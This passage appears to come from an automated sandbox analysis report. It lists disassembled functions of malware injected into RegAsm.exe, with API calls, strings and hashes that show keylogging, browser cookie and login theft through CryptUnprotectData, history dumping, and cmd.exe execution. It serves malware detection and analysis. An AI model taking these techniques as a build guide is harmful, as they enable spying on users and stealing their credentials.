                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                  • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                  • String ID: /sort "Visit Time" /stext "$0NG
                                                  • API String ID: 368326130-3219657780
                                                  • Opcode ID: 38603f56d146c6edc1649b327761de0d025e6f1c59de35fee92e20854b51a343
                                                  • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                  • Opcode Fuzzy Hash: 38603f56d146c6edc1649b327761de0d025e6f1c59de35fee92e20854b51a343
                                                  • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                  Function 0041631F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 00416330
                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                    • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcslen$CloseCreateValue
                                                  • String ID: !D@$okmode$PG
                                                  • API String ID: 3411444782-3370592832
                                                  • Opcode ID: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                  • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                  • Opcode Fuzzy Hash: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                  • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                  Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                  Strings
                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                  • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                  • API String ID: 1174141254-1980882731
                                                  • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                  • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                  • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                  • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                  Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                  Strings
                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                  • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                  • API String ID: 1174141254-1980882731
                                                  • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                  • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                  • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                  • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                  Function 0040B19F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                  • wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventLocalTimewsprintf
                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                  • API String ID: 1497725170-1359877963
                                                  • Opcode ID: 835af189ca981617db22efa5ec6b45afe77894dc59cba662e28b480f06d20bf8
                                                  • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                  • Opcode Fuzzy Hash: 835af189ca981617db22efa5ec6b45afe77894dc59cba662e28b480f06d20bf8
                                                  • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                  Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                  • String ID: Online Keylogger Started
                                                  • API String ID: 112202259-1258561607
                                                  • Opcode ID: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                  • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                  • Opcode Fuzzy Hash: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                  • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                  Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: CryptUnprotectData$crypt32
                                                  • API String ID: 2574300362-2380590389
                                                  • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                  • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                  • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                  • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                  Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                  • CloseHandle.KERNEL32(?), ref: 004051CA
                                                  • SetEvent.KERNEL32(?), ref: 004051D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandleObjectSingleWait
                                                  • String ID: Connection Timeout
                                                  • API String ID: 2055531096-499159329
                                                  • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                  • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                  • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                  • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                  Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Exception@8Throw
                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                  • API String ID: 2005118841-1866435925
                                                  • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                  • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                  • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                  • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                  Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                  • RegSetValueExW.ADVAPI32 ref: 00413888
                                                  • RegCloseKey.ADVAPI32(004752D8), ref: 00413893
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: pth_unenc
                                                  • API String ID: 1818849710-4028850238
                                                  • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                  • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                  • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                  • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                  Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                  • String ID: bad locale name
                                                  • API String ID: 3628047217-1405518554
                                                  • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                  • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                  • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                  • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                  Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                  • ShowWindow.USER32(00000009), ref: 00416C9C
                                                  • SetForegroundWindow.USER32 ref: 00416CA8
                                                    • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                    • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                    • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                  • String ID: !D@
                                                  • API String ID: 3446828153-604454484
                                                  • Opcode ID: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                  • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                  • Opcode Fuzzy Hash: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                  • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                  Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID: /C $cmd.exe$open
                                                  • API String ID: 587946157-3896048727
                                                  • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                  • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                  • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                  • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                  Function 0040B8E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                  • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                  • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: TerminateThread$HookUnhookWindows
                                                  • String ID: pth_unenc
                                                  • API String ID: 3123878439-4028850238
                                                  • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                  • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                  • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                  • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                  Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: GetCursorInfo$User32.dll
                                                  • API String ID: 1646373207-2714051624
                                                  • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                  • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                  • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                  • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                  Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetLastInputInfo$User32.dll
                                                  • API String ID: 2574300362-1519888992
                                                  • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                  • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                  • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                  • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                  Function 0044A084 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __alldvrm$_strrchr
                                                  • String ID:
                                                  • API String ID: 1036877536-0
                                                  • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                  • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                  • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                  • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                  Function 00456C9A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                  • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                  • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                  • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                  Function 00442851 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                  • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                  • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                  • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                  Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                  • Cleared browsers logins and cookies., xrefs: 0040C130
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                  • API String ID: 3472027048-1236744412
                                                  • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                  • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                  • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                  • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                  Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                    • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                    • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                                                  • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                  • Sleep.KERNEL32(00000064), ref: 0040A638
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$ForegroundLength
                                                  • String ID: [ $ ]
                                                  • API String ID: 3309952895-93608704
                                                  • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                  • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                  • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                  • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                  Function 00443AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                  • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                  • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                  • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                  Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                  • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                  • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                  • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                  Function 0041C26E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
